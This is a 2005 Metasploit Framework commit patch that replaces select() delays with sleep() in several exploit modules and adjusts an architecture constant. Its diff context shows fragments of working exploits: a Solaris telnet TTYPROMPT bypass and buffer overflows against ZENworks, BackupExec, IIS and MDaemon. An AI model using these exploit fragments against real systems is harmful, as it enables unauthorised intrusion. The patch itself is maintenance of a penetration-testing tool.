From 3fa5d999a231cc959036186a99bfcddbe20d9e08 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Tue, 27 Dec 2005 04:40:06 +0000
Subject: [PATCH] No more select(nil, nil, nil, X)

git-svn-id: file:///home/svn/incoming/trunk@3259 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/rex/constants.rb                                      | 3 ++-
 modules/exploits/solaris/telnet/solaris_ttyprompt.rb      | 7 +++++++
 modules/exploits/windows/backupexec/name_service.rb       | 2 +-
 modules/exploits/windows/brightstor/universal_agent.rb    | 2 +-
 modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb     | 4 ++--
 modules/exploits/windows/imap/mdaemon_cram_md5.rb         | 2 +-
 modules/exploits/windows/isapi/fp30reg_chunked.rb         | 2 +-
 modules/exploits/windows/novell/zenworks_desktop_agent.rb | 2 +-
 8 files changed, 16 insertions(+), 8 deletions(-)

diff --git a/lib/rex/constants.rb b/lib/rex/constants.rb
index b6afb5a6ae..06207ff197 100644
--- a/lib/rex/constants.rb
+++ b/lib/rex/constants.rb
@@ -75,7 +75,6 @@ ARCH_TYPES =
 		ARCH_PPC,
 		ARCH_SPARC
 	]
-ARCH_ALL   = ARCH_TYPES
 
 
 ARCH_CMD_UNIX  = 'cmd_unix'
@@ -87,3 +86,5 @@ ARCH_CMD       =
 		ARCH_CMD_LINUX,
 		ARCH_CMD_BSD
 	]
+
+ARCH_ALL   = ARCH_TYPES + ARCH_CMD
diff --git a/modules/exploits/solaris/telnet/solaris_ttyprompt.rb b/modules/exploits/solaris/telnet/solaris_ttyprompt.rb
index 6d39923360..205fdc5383 100644
--- a/modules/exploits/solaris/telnet/solaris_ttyprompt.rb
+++ b/modules/exploits/solaris/telnet/solaris_ttyprompt.rb
@@ -29,6 +29,8 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
 				{
 					'Space'    => 2000,
 					'BadChars' => "",
+					'MinNops'  => 0,
+					'MaxNops'  => 0,
 				},
 			'PayloadCompat' =>
 				{
@@ -51,6 +53,9 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
 	def exploit
 		connect
 		
+		banner = sock.get_once
+		
+		p banner
 		print_status("Setting TTYPROMPT...")
 		
 		req = 
@@ -69,10 +74,12 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
 			"\xff\xf0"	
 		
 		sock.put(req)
+		sleep(0.25)
 		
 		print_status("Sending username with 65 environment variables...")
 		sock.put(datastore['USER'] + (" M" * 65) + "\n")
 		sock.put(payload.encoded)
+		sleep(0.25)
 		
 		handler
 		disconnect
diff --git a/modules/exploits/windows/backupexec/name_service.rb b/modules/exploits/windows/backupexec/name_service.rb
index 9120619ae9..13cc45071b 100644
--- a/modules/exploits/windows/backupexec/name_service.rb
+++ b/modules/exploits/windows/backupexec/name_service.rb
@@ -100,7 +100,7 @@ class Exploits::Windows::Backupexec::BackupExecNSOverflow < Msf::Exploit::Remote
 		sock.put(payload.encoded)
 
 		print_status("Waiting for the payload to execute...")		
-		select(nil, nil, nil, 2)
+		sleep(2)
 		
 		handler
 		disconnect
diff --git a/modules/exploits/windows/brightstor/universal_agent.rb b/modules/exploits/windows/brightstor/universal_agent.rb
index 936056aa6f..73c350aca5 100644
--- a/modules/exploits/windows/brightstor/universal_agent.rb
+++ b/modules/exploits/windows/brightstor/universal_agent.rb
@@ -110,7 +110,7 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp
 			disconnect
 
 			# Give the process time to recover from each exception
-			select(nil, nil, nil, 0.1);
+			sleep(0.1);
 		}
 	
 		handler
diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
index 25528f61c7..a066329818 100644
--- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
+++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
@@ -140,7 +140,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
 			end
 			
 			1.upto(8) { |i|
-				select(nil, nil, nil, 0.25)
+				sleep(0.25)
 				return if self.session_created?
 			}
 		}
@@ -155,7 +155,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
 				connect
 			rescue => e
 				print_status("Connection failed (#{i.to_s}/20)...")
-				select(nil, nil, nil, 2)
+				sleep(2)
 				next
 			end
 			return sock
diff --git a/modules/exploits/windows/imap/mdaemon_cram_md5.rb b/modules/exploits/windows/imap/mdaemon_cram_md5.rb
index 342ca33bb3..ad1c7c3a2a 100644
--- a/modules/exploits/windows/imap/mdaemon_cram_md5.rb
+++ b/modules/exploits/windows/imap/mdaemon_cram_md5.rb
@@ -67,7 +67,7 @@ class Exploits::Windows::Imap::MDaemonImapCramMD5Overflow < Msf::Exploit::Remote
 		res = sock.get_once
 		
 		print_status("Received LOGOUT reply: #{res.chomp}")
-		select(nil, nil, nil, 1)
+		sleep(1)
 		
 		handler
 		disconnect
diff --git a/modules/exploits/windows/isapi/fp30reg_chunked.rb b/modules/exploits/windows/isapi/fp30reg_chunked.rb
index 434c42ca63..e522919db7 100644
--- a/modules/exploits/windows/isapi/fp30reg_chunked.rb
+++ b/modules/exploits/windows/isapi/fp30reg_chunked.rb
@@ -83,7 +83,7 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
 				"0\r\n"
 				
 			s.put(req)	
-			select(nil, nil, nil, 1)
+			sleep(1)
 			
 			handler
 			disconnect
diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb
index 652b2d5fd5..045d504e87 100644
--- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb
+++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb
@@ -73,7 +73,7 @@ class Exploits::Windows::Novell::ZenworksDesktopAgentOverflow < Msf::Exploit::Re
 		sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))
 		
 		print_status("Overflow request sent, sleeping for four seconds")
-		select(nil, nil, nil, 4)
+		sleep(4)
 		
 		handler
 		disconnect